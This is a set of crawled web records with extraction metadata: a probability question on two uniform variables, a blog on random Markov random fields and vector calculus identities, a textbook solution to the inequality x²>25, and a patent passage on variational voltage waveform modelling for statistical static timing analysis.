{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6125004887580872, "perplexity": 2287.5747043770357}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368706470784/warc/CC-MAIN-20130516121430-00092-ip-10-60-113-184.ec2.internal.warc.gz"}
https://math.stackexchange.com/questions/3217003/find-probability-of-combination-of-two-uniform-variates
# Find probability of combination of two uniform variates [closed]

$X \sim R(0, 2)$, $Y \sim R(0, 5)$, $X$ and $Y$ are independent. I need to find $P(|X-Y| \leq 1)$.

(The question was closed as off-topic for missing context or other details.)

- What does $R(a, b)$ stand for? – Yanior Weg, May 7 at 11:17
- @YaniorWeg Rectangular/Uniform distribution, presumably. – StubbornAtom, May 7 at 11:19
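Although no answer was posted before the question closed, the value is easy to sanity-check. The region $|x-y| \leq 1$ inside the $[0,2] \times [0,5]$ rectangle has area $\int_0^1 (x+1)\,dx + \int_1^2 2\,dx = 3.5$, so the probability should be $3.5/10 = 0.35$. A quick Monte Carlo sketch (my own addition, not from the thread) confirms this:

```python
import random

# Estimate P(|X - Y| <= 1) for X ~ U(0, 2), Y ~ U(0, 5), independent.
n = 10**6
hits = sum(abs(random.uniform(0, 2) - random.uniform(0, 5)) <= 1
           for _ in range(n))
print(hits / n)  # ~0.35, matching the area computation 3.5 / 10
```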
2019-06-26 14:33:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 3, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.49283158779144287, "perplexity": 1925.7277433021075}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628000353.82/warc/CC-MAIN-20190626134339-20190626160339-00177.warc.gz"}
https://justindomke.wordpress.com/2008/07/
# Marginal Beliefs of Random MRFs A pairwise Markov Random Field is a way of defining a probability distribution over some vector ${\bf x}$. One way to write one is $p({\bf x}) \propto \exp( \sum_i \phi(x_i) + \sum_{(i,j)} \psi(x_i,x_j) )$. Where the first sum is over all the variables, and the second sum is over neighboring pairs. Here, I generated some random distributions over binary valued variables. For each $i$, I set $\phi(x_i=0)=0$, and $\phi(x_i=1)=r_i$ where $r_i$ is some value randomly chosen from a standard Gaussian. For the pairwise terms, I used $\psi(x_i,x_j) = .75 \cdot I(x_i=x_j)$. (i.e. $\psi(x_i,x_j)$ is .75 when the arguments are the same, and zero otherwise.) This is an “attractive network”, where neighboring variables want to have the same value. Computing marginals $p(x_i)$ is hard in graphs that are not treelike. Here, I approximate them using a nonlinear minimization of a “free energy” similar to that used in loopy belief propagation. Here, I show the random single-variate biases $r_i$ and the resulting beliefs.  What we see is constant valued regions (encouraged by $\psi$) interrupted where the $\phi$ is very strong. Now, with more variables. Now, a “repellent” network. I repeated the procedure above, but changed the pairwise interactions to $\psi(x_i,x_j) = -.75 \cdot I(x_i\not=x_j)$. Neighboring variables want to have different values.  Notice this is the opposite of the above behavior– regions of “checkerboard” interrupted where the $\phi$ outvotes $\psi$. Now, the repellent network with more variables. # More Vector Calculus Identities I realize that “rule 2” from the previous post is actually just a special case of the vector chain rule. Rule 4. (Chain rule) If $f({\bf x}) = {\bf g}({\bf h}({\bf x}))$, then $J[{\bf f}] = J[{\bf g}]J[{\bf h}]$, or equivalently, $\frac{ \partial{\bf f} }{ \partial{\bf x}^T} = \frac{ \partial{\bf g} }{ \partial{\bf h}^T} \frac{ \partial{\bf h} }{ \partial{\bf x}^T}$. Here, I have used ${\bf h}$ to denote the argument of ${\bf g}$. (That makes it look more like the usual chain rule.) From this, you get the special case where $g$ is a scalar function. (I use the non-boldface $g$ in $g({\bf h})$ to suggest that $g$ is a scalar function that operates ‘element-wise’ on vector input.) Rule 4. (Chain rule– special case for a scalar function) If $f({\bf x}) = g({\bf h}({\bf x}))$, then $J[{\bf f}]({\bf x}) = \text{diag}[ g'({\bf h})] J[{\bf h}]$, or equivalently, $J[{\bf f}]({\bf x}) = g'({\bf h}) {\bf 1}^T \odot J[{\bf h}]$. In the last line, I use the fact that $\text{diag}({\bf x})A = {\bf x}{\bf 1}^T \odot A$. Finally, substituting $g = g' = \exp$ gives the special case below. # Vector Calculus Identities Suppose $g({\bf x}) = {\bf p}({\bf x})^T {\bf q}({\bf x})$. That is, $g$ is a scalar function of a vector ${\bf x}$, given by taking the inner product of the two vector valued functions ${\bf p}$ and ${\bf q}$. Now, we would like the gradient of $g$, i.e. $\frac{\partial g}{\partial \bf x}$. What is it? I frequently need to find such derivatives, and I have never been able to find any reference for rules to calculate them. (Though such rules surely exist somewhere!) Today, Alap and I derived a couple simple rules. The first answers the above question. Rule 1. If $g({\bf x}) = {\bf p}({\bf x})^T {\bf q}({\bf x})$, then, $\frac{\partial g}{\partial \bf x} = J[{\bf p}]^T {\bf q}({\bf x}) + J[{\bf q}]^T{\bf p}({\bf x})$. Here, $J[{\bf p}]=\frac{\partial {\bf p}}{\partial {\bf x}^T}$ is the Jacobian. i.e. 
$J_{i,j} = \frac{\partial p_i }{\partial x_j}$ This rule is a generalization of the calculus 101 product rule, where $g(x)=p(x) q(x)$ (everything scalar), and $g'(x) = p'(x) q(x) + q'(x) p(x)$. A different rule concerning exponentials is Rule 2. If ${\bf f}({\bf x}) = \exp({\bf q}({\bf x}))$, then $J[{\bf f}]= \frac{\partial {\bf f}}{\partial {\bf x}^T} = \exp( {\bf q}({\bf x})) {\bf 1}^T \odot J[{\bf q}]$. Here, $\odot$ is the element-wise product. The strange product with ${\bf 1}^T$ can be understood as "copying" the first vector. That is, ${\bf x} {\bf 1}^T$ is a matrix where each column consists of $\bf x$. (The number of columns must be understood from context.) Rule 3. If ${\bf f}({\bf x}) = {\bf p}({\bf x}) \odot {\bf q}({\bf x})$, then $J[{\bf f}] ={\bf p}({\bf x}){\bf 1}^T \odot J[{\bf q}] + J[{\bf p}] \odot {\bf q}({\bf x}){\bf 1}^T$ Surely there exists a large set of rules like this somewhere, but I have not been able to find them, despite needing things like this for years now. What I would really like to do is use a computer algebra system, such as Maple, Mathematica or Sage to do this, but that doesn't seem possible at present. (It is suggested in that thread that Mathematica is up to the job, but I have tested it out and found that not to be true.)
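For what it's worth, sympy can at least verify Rule 1 symbolically for concrete choices of ${\bf p}$ and ${\bf q}$. A small sketch (the example functions are my own, chosen arbitrarily):

```python
import sympy as sp

x1, x2 = sp.symbols('x1 x2')
x = sp.Matrix([x1, x2])

# Example vector-valued functions p(x) and q(x)
p = sp.Matrix([x1**2 * x2, sp.sin(x2)])
q = sp.Matrix([x2, x1 + x2**2])

g = (p.T * q)[0]                                  # g(x) = p(x)^T q(x), a scalar
grad_g = sp.Matrix([g.diff(v) for v in x])        # gradient of g

rhs = p.jacobian(x).T * q + q.jacobian(x).T * p   # Rule 1's right-hand side
print(sp.simplify(grad_g - rhs))                  # Matrix([[0], [0]])
```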
2018-11-20 00:32:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 48, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9251424670219421, "perplexity": 407.25164680536415}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039746171.27/warc/CC-MAIN-20181119233342-20181120015342-00325.warc.gz"}
https://www.gradesaver.com/textbooks/math/precalculus/precalculus-6th-edition-blitzer/chapter-2-section-2-7-polynomial-and-rational-inequalities-exercise-set-page-415/98
## Precalculus (6th Edition) Blitzer

The provided statement is false, and the correct statement is "The solution set of ${{x}^{2}}>25$ is $\left( -\infty ,-5 \right)\cup \left( 5,\infty \right).$" The provided inequality is ${{x}^{2}}>25$. Rewrite the provided inequality as ${{x}^{2}}-25>0$. In order to get the solution of ${{x}^{2}}>25$, first equate the function to $0$, that is, solve ${{x}^{2}}-25=0$. Then, \begin{align} & {{x}^{2}}-25=0 \\ & {{x}^{2}}-{{5}^{2}}=0 \\ & \left( x-5 \right)\left( x+5 \right)=0 \end{align} Equating each factor to 0 gives $x=-5$ or $x=5$. These boundary points divide the number line into three intervals; testing a value from each (for example $x=-6$, $x=0$, and $x=6$) shows that ${{x}^{2}}-25>0$ holds only on the two outer intervals. Therefore, the solution set of ${{x}^{2}}>25$ is $\left( -\infty ,-5 \right)\cup \left( 5,\infty \right),$ and thereby the provided statement is false.
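For readers who want to double-check, sympy solves the inequality directly (a quick verification of my own, not part of the textbook solution):

```python
import sympy as sp

x = sp.symbols('x', real=True)
print(sp.solve_univariate_inequality(x**2 > 25, x))
# ((-oo < x) & (x < -5)) | ((5 < x) & (x < oo))
```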
2019-12-10 23:56:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9992806315422058, "perplexity": 456.52465364881937}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540529516.84/warc/CC-MAIN-20191210233444-20191211021444-00257.warc.gz"}
https://www.sparrho.com/item/representing-and-propagating-a-variational-voltage-waveform-in-statistical-static-timing-analysis-of-digital-circuits/107f5b1/
# REPRESENTING AND PROPAGATING A VARIATIONAL VOLTAGE WAVEFORM IN STATISTICAL STATIC TIMING ANALYSIS OF DIGITAL CIRCUITS

Imported: 10 Mar '17 | Published: 09 Oct '08

Soroush Abbaspour, David J. Hathaway, Chandramouli Visweswariah, Jinjun Xiong, Vladimir Zolotov

USPTO - Utility Patents

## Abstract

An approach that represents and propagates a variational voltage waveform in statistical static timing analysis of digital circuits is described. In one embodiment, there is a statistical static timing analysis tool for analyzing digital circuit designs. The statistical static timing analysis tool includes a variational waveform modeling component that is configured to generate a variational waveform model that approximates arbitrary waveform transformations of waveforms at nodes of a digital circuit. The variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform. A variational waveform propagating component is configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model.

## Description

### BACKGROUND

This invention relates generally to design automation of Very Large Scale Integrated (VLSI) circuits, and more particularly to waveform modeling and propagation in statistical static timing analysis of digital circuits.

Static timing analysis (STA) has been used to verify the timing correctness of VLSI circuits. In particular, STA analyzes the VLSI circuits to determine the earliest and latest possible signal arrival times on each logic path or node by propagating signals throughout the gates and interconnects that form the path. The accuracy of timing analysis is heavily dependent on the modeling and propagation of digital signals throughout a design timing graph. The most common and widely used model for transition waveforms of digital signals is the well-known saturated ramp model. The use of the saturated ramp model eases the timing analysis since each voltage waveform is uniquely defined by its arrival time and transition time, also referred to as slew. However, in a real design, the digital signal's shape could be very different from that of the saturated ramp. The actual shape of the gate or interconnect output signals depends on many factors including: the input signal waveform applied to the gate or interconnect, the gate and interconnect topology, the nonlinearities of the gate input capacitances, the coupling and power supply noise, etc. It has been shown that the saturated ramp model is not sufficiently accurate for modeling the complex behavior of signals in high speed deep submicron VLSI circuits. Approximating signal waveforms by saturated ramps can incur as much as 19% error in final timing results. To overcome this problem, there have been several attempts to represent signal waveforms with more advanced models, such as piecewise linear waveforms, Weibull, Gamma and even arbitrary functions. These proposed models have helped to reduce the error of calculating arrival times by as much as 50-80%. These modeling techniques are advantageous, in particular, for static timing with a current source driver model or transistor level timing (TLT) analysis.
Both the current source driver model and TLT analysis can easily handle complex waveforms and provide higher accuracy when operating with advanced waveform models. These models have also been employed for accurate coupling noise analysis as well as signal propagation through interconnects. As complementary metal-oxide-semiconductor (CMOS) technology moves toward ultra deep sub-micron (UDSM) technologies, variability becomes the major obstacle for designing high-performance VLSI circuits. Therefore, there is a need for an advanced analysis tool which is capable of handling variability that stems from imperfect CMOS manufacturing processes, environmental factors, and device fatigue phenomena. Variability makes it difficult to verify that a chip will function correctly before releasing it for manufacturing. Statistical static timing analysis (SSTA) is one approach that addresses issues associated with variability.

As with its STA counterpart, today's SSTA tools only propagate two components of the digital signals (i.e., arrival time and transition time) by interpreting them as random variables or, perhaps, functions of process parameters modeled as random variables. Despite improving the accuracy of STA, advanced models of signal waveforms are still not very popular for SSTA since SSTA requires variational waveform modeling. The variational waveform modeling can be easily constructed for saturated ramp models of signal waveforms by representing signal transition times and arrival times as random quantities. However, the extension to the advanced models is not straightforward. For instance, one can model the signals with an exponential function and evaluate the timing constant of the exponent as a random quantity. This timing constant is proportional to the slew of a saturated ramp signal. However, an exponential waveform model has only marginal accuracy benefits compared to a traditional saturated ramp model and is not appropriate to mimic the accuracy of more advanced waveform models.

Modeling arbitrary signal waveforms with random functions due to the effect of environmental and process variations has also been studied for use in SSTA. In particular, it has been proposed to consider the crossing time of each point of the signal transition as a random quantity. To do that, the signal waveforms are modeled with Markovian random processes. However, the definition of Markovian random processes is too broad and contains a wide range of random functions. One of the main features of a Markovian process is the dependence of each point only on its immediate history. This dependency is statistical, which means that probabilities of the new state depend on the previous states. Waveforms in manufactured chips belong to a much narrower class of random functions. Their main property is the fact that the waveform shape can be fully determined by the actual values of environmental and process parameters. In addition, the proposed point-wise variational waveform modeling is not efficient for SSTA since each signal is represented with a rather large number of random quantities in canonical, or first order linear, forms. This type of variational waveform modeling results in high memory consumption, and it is highly inefficient for production use. Therefore, there is a need for a modeling technique for waveform variation that can be used for SSTA.

### SUMMARY

In one embodiment, there is a method for statistical static timing analysis of a digital circuit.
In this embodiment, the method comprises: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model.

In a second embodiment, there is a computer-readable medium storing computer instructions, which when executed, enable a computer system to perform a statistical static timing analysis of a digital circuit. In this embodiment, the computer instructions comprise: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model.

In a third embodiment, there is a statistical static timing analysis tool for analyzing digital circuit designs. In this embodiment, the tool comprises a variational waveform modeling component that is configured to generate a variational waveform model that approximates arbitrary waveform transformations of waveforms at nodes of a digital circuit. The variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform. A variational waveform propagating component is configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model.

### DETAILED DESCRIPTION

Embodiments of this invention are directed to a general, compact, and efficient variational waveform modeling technique that represents the voltage variation between the source pin and the sink pin of a gate or an interconnect in a VLSI circuit. This variational waveform modeling technique can handle the effect of environmental and manufacturing process sources of variation, including the power and ground voltage variations.

FIG. 1 illustrates a transient voltage waveform and its saturated ramp approximation. In particular, FIG. 1 shows an exemplary signal transition 101 that would be produced by STA at a point within a circuit as it propagates timing information from circuit primary inputs to circuit primary outputs. Without loss of generality, it is assumed that the signal waveform 101 is monotone. Any signal waveform can be determined by its crossing time points, 102, 103, 104, i.e., time values by which the signal crosses selected voltage levels, 105, 106, 107, respectively. Voltage levels are usually expressed in fractions or percentiles of a supply voltage (Vdd) 108. The latest crossing time point corresponding to the 0% (100%) point of Vdd for a rising (falling) transition is referred to as the transition start time 109.
A saturated ramp model 110 is one well-known model that represents digital signals. In the case of saturated ramp modeling, the signal transition is specified by its arrival time 111 and slew 112. The signal arrival time 111 is usually defined as the time when the signal crosses the 50% point of Vdd 106, while the signal slew 112 is the duration of the ramp. There are several ways to approximate a signal waveform with a saturated ramp. For instance, a signal waveform might be approximated with a saturated ramp with the same 50% crossing point as the original waveform. The approximated ramp transition time may also be computed as the time difference between the 10% of Vdd 105 and 90% of Vdd 107 crossing points of the original waveform, multiplied by 1.25.

In real circuit scenarios, the signal arrival time and transition time in the design depend on many different factors, including the technology and manufacturing process parameters. Due to the statistical nature of technology and manufacturing process parameters, modeling with random variables with determined probability distributions may be used. In parameterized SSTA, every timing quantity (e.g. arrival times, required arrival times, delays, slews) is represented in the first order canonical form as shown in equation 1:

$A = a_0 + \sum_{i=1}^{n} a_i \Delta X_i + a_R \Delta R_a \quad (1)$

where:

- $A$ is the timing quantity in the first order canonical format;
- $a_0$ is the nominal value of the timing quantity $A$;
- $\Delta X_i = X_i - \hat{X}_i$ is the variation of the $i$th source of variation, $X_i$, from its nominal value $\hat{X}_i$;
- $a_i$ is the sensitivity of the timing quantity $A$ to the process parameter $X_i$;
- $\Delta R_a$ is the normalized (zero mean and unit sigma) random variable used to model the uncorrelated variation in quantity $A$;
- $a_R$ is the sensitivity of the timing quantity $A$ to the uncorrelated variation $\Delta R_a$.

The sources of variation, $X_i$, in the first order canonical form are usually assumed to have Gaussian distributions with zero means and unit standard deviations. The first order canonical form can be extended to handle non-Gaussian distributions and also to capture the nonlinear dependency of the timing quantities on the sources of variation. In one embodiment of this invention, the concept of the first order canonical form is exercised with Gaussian sources of variation for further discussion, and it can be easily extended to non-Gaussian sources of variation as well as to nonlinear dependence of the timing quantities on the sources of variation.

FIGS. 2A-2B show a circuit fragment and perturbation of its signal waveform due to environmental and manufacturing process variation. In particular, FIG. 2A shows a partition of a CMOS design with interconnected NAND gates 201, 202, 203, and inverter gate 204. Without loss of generality, FIG. 2A shows the signal waveform 206 at the output terminal of the inverter 204. It is assumed that the nominal waveform in the design is obtained by setting the sources of variation to their nominal values ($\hat{X}_1, \hat{X}_2, \ldots$). As shown in FIG. 2B, the nominal voltage waveform 207 at the output terminal of the inverter G 204 is denoted by $V_{G,nom}(t)$. In addition, FIG. 2B shows the perturbed voltage waveform (e.g., due to the variation of process parameters) 208 at the output terminal of the inverter G 204, denoted by $V_G(t)$ 208.
Also, as shown in FIG. 2(B), crossing times 209 of the perturbed voltage waveform $V_G(t)$ 208 for the same voltage level could be different from the corresponding crossing times of the nominal waveform $V_{G,nom}(t)$ 207. It should be added that variation in the ground and supply voltages may cause the voltage levels of the perturbed waveform to be different from the nominal ones 210.

As mentioned above, the variation in the perturbed waveform $V_G(t)$ is a function of many factors, including: 1) the variations in the gate input waveform, 2) the variations in gate process parameters, 3) the variations in the gate output load, 4) the variations in supply and ground voltages (Vdd and Vss), etc. Variation in the power supply and ground voltage levels not only causes changes to the crossing times of the gate output waveform $V_G(t)$ but also to its voltage levels. In contrast, variation of the gate parameters and gate input voltage waveform only affects the crossing times of the perturbed waveform $V_G(t)$ and not the voltage levels. This is valid under the assumption that the leakage current is negligible.

In one embodiment of this invention, it is assumed that $T_{var}$ is the operator that transforms the nominal waveform $V_{nom}(t)$ into the perturbed waveform $V(t)$ due to the effect of process variation, as shown in equation 2:

$T_{var}: V_{nom}(t) \rightarrow V(t) \quad (2)$

The following are the steps to develop a variational signal waveform model:

1. A set, $S$, of primitive waveform transformation operators $T_{prim,1}, T_{prim,2}, \ldots$ is constructed, where each of these operators is in charge of a basic variation of waveforms. None of these operators can be obtained as a superposition of the other operators in the set. Each of these operators has a parameter which defines its amount of change to the nominal waveform. Unit values of the parameters used to define the amount of change for each operator form a basis set for a waveform variation space.
2. Given an arbitrary waveform transformation operator $T$, it is approximated with an optimal superposition of the primitive operators $T_{prim,1}, T_{prim,2}, \ldots$ such that it results in a minimum approximation error. This technique helps to focus on a smaller set of operators (i.e. only on the primitive operators) instead of dealing with an arbitrary waveform operator.
3. Next, a set of techniques is developed to propagate variational waveforms through gates and interconnects.

As an example, transformation of any saturated ramp signal into another saturated ramp signal is done by transforming the arrival time and slew of the nominal saturated ramp signal. These basic transformation operators are called time shifting and time stretching. The time shifting operator shifts each crossing time of the original waveform by the same amount. The time stretching operator multiplies all the crossing times by the same factor, thereby affecting the nominal waveform transition time. These two transformations are used to generate a variety of waveforms from a small set of base signal waveforms. Applying the same technique, it is possible to duplicate any waveform transformation operator $T$ with an optimal superposition of the time shifting $S_t$ and time stretching $M_t$ operators.

FIGS. 3A and 3B illustrate the time shifting and time stretching operators. Consider a signal waveform $V_{nom}(t)$ with start time $t_0$.
Assume that the time shifting operator $S_t$, which shifts the nominal waveform $V_{nom}(t)$ by the value $B$, is as shown in equation 3:

$S_t(B): V_{nom}(t) \rightarrow V(t) = V_{nom}(t-B) \quad (3)$

Similarly, suppose the time stretching operator $M_t$, which stretches the nominal waveform $V_{nom}(t)$ by a factor $A$, is expressed as follows in equation 4:

$M_t(A): V_{nom}(t) \rightarrow V(t) = V_{nom}(t-A(t-t_0)) \quad (4)$

If $B$ is a positive (negative) value, then the time shifting operator shifts every crossing time point of the nominal waveform, 301, and thereby the arrival time, by the same amount $B$ toward the right-hand (left-hand) side. For instance, if $B=10$ ps, every crossing time point is delayed by 10 ps, and thereby the arrival time of the shifted waveform, 302, is 10 ps greater than the arrival time of the nominal waveform, 301. If $A$ is a positive value, the time stretching operator makes the transition time of the stretched waveform, 304, slower than that of the nominal waveform, 303, since each crossing point of the nominal waveform is delayed by an amount proportional to its time distance from the transition start time $t_0$. For instance, if $A=0.1$, the crossing time points are delayed by 10% relative to the transition start time. If $A$ is negative, the transition is sped up (i.e. the slew will decrease).

Apparently, time shifting and stretching operators cannot model the waveform perturbations caused by power and ground voltage variations. In order to model these types of waveform transformations, voltage shifting $S_v$ and voltage stretching $M_v$ operators are introduced. The voltage shifting operator models waveform perturbation due to bouncing of the ground voltage Vss. The voltage stretching operator models waveform perturbation due to the variation of the difference between supply and ground voltages, Vdd-Vss, which usually happens due to power grid voltage drop. The transformation of the nominal waveform by the voltage shifting operator $S_v$ is represented as follows in equation 5:

$S_v(D): V_{nom}(t) \rightarrow V(t) = V_{nom}(t) + D \cdot V_{dd,nom} \quad (5)$

where parameter $D$ defines the amount of voltage shift as a fraction of the nominal supply voltage $V_{dd,nom}$. $D=0$ means no voltage shift, and $D=0.1$ means that the nominal waveform, 305, is shifted up by 10% of $V_{dd,nom}$; thereby, the voltage levels of the shifted waveform, 306, are both greater than the voltage levels of the nominal waveform, 305, by 10% of the supply voltage (FIG. 3C). Furthermore, the transformation of the nominal waveform by the voltage stretching operator $M_v$ is shown as follows in equation 6:

$M_v(C): V_{nom}(t) \rightarrow V(t) = V_{nom}(t)(1+C) \quad (6)$

where $C$ defines the variation of the waveform voltage relative to its nominal value. $C=0$ means no voltage stretching, and $C=0.1$ means that each voltage level is increased by 10% of its nominal value. So, if the nominal waveform, 307, transitions from 0 to Vdd, then the stretched waveform, 308, transitions from 0 to 1.1 Vdd. Negative values of $C$ will result in voltage level reduction (FIG. 3D).

One can approximate any arbitrary waveform transformation operator $T$ with an optimal superposition of the four primitive waveform transformation operators (i.e., time shifting $S_t(B)$, time stretching $M_t(A)$, voltage shifting $S_v(D)$, and voltage stretching $M_v(C)$). A first order model approximation for an arbitrary waveform transformation operator $T$ is shown in equation 7 as follows:

$T = S_t(B) \circ M_t(A) \circ S_v(D) \circ M_v(C): V_{nom}(t) \rightarrow V(t) = (1+C)V_{nom}(t - A(t-t_{nom,0}) - B) + D \cdot V_{dd} \quad (7)$

The main advantage of this representation is that if the nominal waveform $V_{nom}(t)$ is known, it is easy to compute the perturbed waveform $V(t)$.
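Equation 7 is straightforward to prototype numerically. Below is a minimal sketch (my own illustration, not from the patent; the tanh nominal waveform and all parameter values are hypothetical) of how a perturbed waveform can be computed from a nominal one:

```python
import numpy as np

def perturbed_waveform(v_nom, t, t0, A, B, C, D, vdd_nom=1.0):
    # First order variational waveform model (cf. equations 7/8):
    #   V(t) = (1 + C) * V_nom(t - A*(t - t0) - B) + D * Vdd_nom
    return (1.0 + C) * v_nom(t - A * (t - t0) - B) + D * vdd_nom

# Hypothetical nominal waveform: a smooth 0 -> Vdd rising transition
v_nom = lambda t: 0.5 * (1.0 + np.tanh(t - 5.0))

t = np.linspace(0.0, 10.0, 201)
v = perturbed_waveform(v_nom, t, t0=0.0, A=0.1, B=0.5, C=0.05, D=0.02)
# A delays crossings proportionally to (t - t0), B shifts them uniformly,
# C scales the voltage swing, and D lifts the whole waveform by 2% of Vdd.
```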
Moreover, as is discussed later, one can easily compute the sensitivities of the crossing times to the process parameters. This will help to design efficient algorithms to propagate variational waveforms through gates and interconnects. Note that the aforementioned primitive waveform transformation operators are selected since they are intuitive for constructing a variational waveform model. Those skilled in the art will recognize that other primitive waveform transformation operators can be used, including complex ones with higher degrees of freedom which can better approximate arbitrary waveform transformations in a real circuit. Furthermore, those skilled in the art will recognize that equation 7 can be represented in other formats. For example, equation 7 can be represented in the following format shown in equation 8: $V_{A,B,C,D}(t) = (1 + C) \, V_{nom}(t - A(t - t_{nom,0}) - B) + D \, V_{dd,nom}$ (8) where Vdd,nom is the nominal supply voltage value. Equation 8 is also referred to as the first order linear transformation model since the waveform VA,B,C,D(t) is obtained from the nominal waveform Vnom(t) by linear transformations of the time and voltage dimensions. However, this equation includes a significant amount of nonlinearity by assuming that the nominal waveform Vnom(t) is an arbitrary waveform (i.e. not a saturated ramp). This equation can also be interpreted as a parameterized representation of waveform perturbation. Each parameter A, B, C, and D is in charge of its specific type of waveform perturbation (i.e. A for time stretching, B for time shifting, C for voltage stretching, and D for voltage shifting). Each set of parameter values A, B, C, D defines a unique waveform VA,B,C,D(t) obtained by the perturbation of the nominal waveform Vnom(t). If A=0, B=0, C=0, D=0 the transformed waveform V(t) is exactly the same as the nominal waveform Vnom(t). In general, it may not be possible to represent every perturbed waveform from its nominal waveform in the form of equation 8. This representation only captures the most basic but essential types of variations, i.e. time and voltage shifting and stretching, in the linear format. However, those skilled in the art will recognize that other possible representations exist. For example, one possibility is to add more nonlinear stretching operators to model more degrees of freedom in the waveform variation, as shown in equation 9: $V_{A,B,C,D}(t) = V_{nom}(\tau) + C_1 \, V_{nom}(\tau) + C_2 \, V_{nom}^2(\tau) + \dots + D \, V_{dd,nom}$, where $\tau = t - A_1(t - t_{nom,0}) - A_2(t - t_{nom,0})^2 - \dots - B$ (9) Due to the effect of environmental and process variation, signal waveforms in real circuits are different from the computed nominal ones in the absence of variability. If the manufacturing processes are modeled with random variables, the digital signal waveforms can be represented as random functions. This implies that the perturbed waveform at a specific point in a design in one manufactured chip could be different from that at the same point in another manufactured chip. The shape of the waveforms is determined by the actual values of environmental and process parameters. Referring to equation 8, the parameters A(X1, X2, . . . ), B(X1, X2, . . . ), C(X1, X2, . . . ), D(X1, X2, . . . ) of variational waveforms are functions of random environmental and process parameters X1, X2, . . . .
